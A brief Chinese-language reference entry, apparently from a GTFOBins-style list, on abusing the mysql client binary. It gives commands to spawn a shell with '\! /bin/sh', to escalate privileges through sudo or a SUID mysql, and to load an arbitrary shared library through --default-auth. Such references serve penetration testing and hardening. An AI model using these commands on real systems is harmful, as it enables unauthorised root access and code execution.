用来生成一个交互式的系统shell。
mysql -e '\! /bin/sh'
如果二进制文件被 sudo 允许以超级用户身份运行,可能被用于访问文件系统、提升或维持特权访问。
sudo mysql -e '\! /bin/sh'
suid是一种授予文件的权限类型,它允许用户使用者以文件所有者的权限来执行文件。
./mysql -e '\! /bin/sh'
加载共享库,这些共享库可以被用来在二进制文件的执行上下文中运行代码。
/path/to/lib.so
shared object.
mysql --default-auth ../../../../../path/to/lib